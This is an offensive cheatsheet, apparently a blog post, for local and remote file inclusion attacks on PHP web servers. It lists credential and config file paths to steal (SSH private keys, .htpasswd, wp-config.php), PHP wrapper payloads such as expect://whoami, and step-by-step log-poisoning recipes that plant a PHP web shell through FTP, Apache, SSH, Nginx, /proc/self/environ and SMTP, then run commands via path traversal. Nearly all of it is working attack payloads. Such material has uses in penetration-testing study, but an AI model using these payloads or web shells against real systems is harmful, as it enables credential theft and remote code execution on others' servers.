LFI / RFI Cheatsheet

Passwords, Credentials, PHP Wrappers & Log Poisoning

Andy Gregg

2 min readMar 5, 2021

Passwords & Credentials

SSH

/var/lib/username/.ssh/id_rsa
/home/username/.ssh/id_rsa

Apache

/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/etc/apache2/htpasswd
/etc/apache2/.htpasswd
/etc/apache/.htpasswd
/etc/apache2/apache2.conf

CMS

WordPress: /var/www/html/wp-config.php
Joomla: /var/www/configuration.php
Dolphin: /var/www/html/inc/header.inc.php
Drupal: /var/www/html/sites/default/settings.php

XAMPP

C:/xampp/security/webdav.htpasswd

C:/xampp/apache/conf/httpd.conf

C:/xampp/apache/logs/access.log

PHP Wrapper

php://filter/convert.base64-encode/resource=

file=expect://whoami

php://input&cmd=whoami

Log Poisoning

FTP

Firstly, you need to be able to access:
../../../../../../../../var/log/vsftpd.log
If this is possible, attempt to log in:
ftp 192.168.x.x
Supply the following name:
Name: <?php system($_GET[‘cmd’]); ?>
Exit and attempt the below execution:
../../../../../../../../var/log/vsftpd.log&cmd=whoami

Apache2 I

Firstly, you need to be able to access:
../../../../../../../../var/log/apache2/access.log
If this is possible, attempt to poison:
nc 192.168.xx.xx 80
Enter the following and press enter:
<?php system($_GET[‘cmd’]); ?>
Exit and attempt the below execution:
../../../../../../../../var/log/apache2/access.log&cmd=whoami

Apache2 II

Firstly, you need to be able to access:
../../../../../../../../var/log/apache2/access.log
If this is possible, attempt to poison within the User-Agent:
<?php system($_GET[‘cmd’]); ?>
Exit and attempt the below execution:
../../../../../../../../var/log/apache2/access.log&cmd=whoami

SSH

Firstly, you need to be able to access:
../../../../../../../../var/log/auth.log
Attempt to login using the following:
ssh ‘<?php echo system($_GET[“cmd”]); exit; ?>’@192.168.x.x
Exit and attempt the below execution:
../../../../../../../../var/log/auth.log&cmd=whoami

Nginx

Firstly, you need to be able to access:
../../../../../../../../var/log/nginx/access.log
Attempt to inject the following:
http://192.168.x.x/file.php?file=<?php system($_GET[‘cmd’]); ?>
Attempt the below execution:
../../../../../../../../var/log/nginx/error.log&cmd=whoami

Environ

Firstly, you need to be able to access:
../../../../../../../../proc/self/environ
If this is possible, attempt to poison within the User-Agent:
<?php system($_GET[‘cmd’]); ?>
Exit and attempt the below execution:
../../../../../../../../proc/self/environ&cmd=whoami

SMTP

Get username first (/etc/passwd)
telnet 192.168.x.x 25
Enter the following:
EHLO andy
VRFY username@localhost
mail from: andy@hack.com
rcpt to: username@localhost
data
Subject: owned
<?php echo system($_REQUEST[‘cmd’]); ?>
Press Enter.
dot (.)
Press Enter.
Exit and attempt the below execution:
../../../../../../../../var/mail/username&cmd=whoami